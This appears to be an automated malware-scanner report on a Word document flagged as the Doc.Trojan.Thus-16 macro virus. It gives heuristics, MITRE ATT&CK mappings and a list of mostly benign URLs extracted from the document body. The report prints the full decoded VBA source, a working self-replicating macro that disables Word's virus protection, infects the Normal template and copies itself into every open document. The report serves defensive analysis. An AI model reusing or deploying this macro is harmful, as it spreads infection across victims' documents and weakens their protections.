MALICIOUS
118
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code within Office documents. Heuristics indicate the document uses urgency and callback lures, suggesting a phishing or scam attempt. The presence of VBA macros points to the T1059.005 (Visual Basic) technique, and the overall nature of the document suggests it was likely delivered as a Spearphishing Attachment (T1566.001). While specific IOCs for malicious URLs are not clearly identified as confirmed malicious, the structure and heuristics strongly indicate a malicious intent.
Heuristics 6
-
ClamAV: Doc.Trojan.Thus-16 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Thus-16
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long Private Sub Document_Open() 'Mat1' On Error Resume Next Application.Options.VirusProtection = False If NormalTemplate.VBProject.VBComponents.I … -
Callback phishing phone lure medium SE_CALLBACK_LUREDocument asks the user to call a phone number in billing, refund, subscription, fraud, or security context — consistent with callback phishing or tech-support scam patterns. Suppressed for legitimate-issuer (IRS/gov/official-form) documents that carry no urgency or charge/dispute escalation.
-
Urgency / deadline lure low SE_URGENCY_LUREDocument contains urgency or deadline language ('account will be terminated', 'action required within 24 hours', etc.) — useful context, but low-signal without other findings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.hunterspointcommunity.com/ In document text (OLE body)
- http://illuminatedthread.com/In document text (OLE body)
- http://illuminatedthread.comIn document text (OLE body)
- http://illuminatedthread.com/stage_1/main_stage_1.htmlIn document text (OLE body)
- http://europe.theoildrum.com/node/5528In document text (OLE body)
- http://illuminatedthread.com/default.htmlIn document text (OLE body)
- http://illuminatedthread.com/stage_2/main_stage_2_part_2.html#blue_roomIn document text (OLE body)
- http://illuminatedthread.com/stage_2/main_stage_2_part_3.html#joy_of_infinityIn document text (OLE body)
- http://ranprieur.com/essays/dropoutcrit.htmlIn document text (OLE body)
- http://illuminatedthread.com/stage_2/about_project/about_project.htmlIn document text (OLE body)
- http://illuminatedthread.com/stage_3/main_stage_3_part_3.htmlIn document text (OLE body)
- http://illuminatedthread.com/#watertower_sessionsIn document text (OLE body)
- http://www.chicagobreakingnews.com/2010/09/quinn-announces-4-million-grant-to-raze-blues-brothers-mall.htmlIn document text (OLE body)
- http://chucksphotospot.com/In document text (OLE body)
- http://www.laforum.org/content/competitions/dead-mallsIn document text (OLE body)
- http://www.galleryAD.comIn document text (OLE body)
- http://www.parole.aporee.orgIn document text (OLE body)
- http://adamantine.wordpress.com/stuff/quitting-the-paint-factory-by-mark-slouka/In document text (OLE body)
- http://en.wikipedia.org/wiki/Orange_Crush_interchangeIn document text (OLE body)
- http://en.wikipedia.org/wiki/Stalker_%28film%29In document text (OLE body)
- http://en.wikipedia.org/wiki/NostalghiaIn document text (OLE body)
- http://vimeo.com/3859575In document text (OLE body)
- http://vimeo.com/3869774In document text (OLE body)
- http://vimeo.com/4119215In document text (OLE body)
- http://vimeo.com/4189317In document text (OLE body)
- http://vimeo.com/6990384In document text (OLE body)
- http://vimeo.com/6079374In document text (OLE body)
- http://www.nytimes.com/2009/11/09/opinion/09douthat.htmlIn document text (OLE body)
- http://cluborlov.blogspot.com/search/label/ruinsIn document text (OLE body)
- http://cluborlov.blogspot.com/2009/11/oceans-are-coming-part-ii-living-on.htmlIn document text (OLE body)
- http://vimeo.com/14095124In document text (OLE body)
- http://vimeo.com/12091362In document text (OLE body)
- http://vimeo.com/13123393In document text (OLE body)
- http://vimeo.com/user674524/videosIn document text (OLE body)
- http://vimeo.com/6987264In document text (OLE body)
- http://en.wikipedia.org/wiki/Dixie_Square_MallIn document text (OLE body)
- http://atlasobscura.com/place/dixie-square-mallIn document text (OLE body)
- http://www.flickr.com/photos/mikebrown3506/2398806257/#/photos/mikebrown3506/2398806257/lightbox/In document text (OLE body)
- http://www.flickr.com/photos/mikebrown3506/2398806019/in/photostream/#/photos/mikebrown3506/2398806019/in/photostream/lightbox/In document text (OLE body)
- http://www.flickr.com/photos/jordannicolette/2838273999/in/photostream/#/photos/jordannicolette/2838258761/in/photostream/lightbox/In document text (OLE body)
- http://www.facebook.com/home.php?#!/group.php?gid=37301811510In document text (OLE body)
- http://en.wikipedia.org/wiki/Ship_naming_and_launchingIn document text (OLE body)
- http://www.good.is/post/wasteland-twinning-turns-forgotten-spaces-into-artists-canvases/In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1956 bytes |
SHA-256: 9d4cc1797b936f1525d8d629627a88f7ee5da07ae6f7f77f231f81fedcf7de4f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Private Sub Document_Open()
'Mat1'
On Error Resume Next
Application.Options.VirusProtection = False
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> "'Mat1'" Then
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, _
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
End If
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines _
1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines _
(1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
End If
If NormalTemplate.Saved = False Then NormalTemplate.Save
For k = 1 To Application.Documents.Count
If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> "'Mat1'" Then
Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.DeleteLines _
1, Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines
End If
If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.InsertLines _
1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines _
(1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
End If
Next k
End Sub
Private Sub Document_New()
Document_Open
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.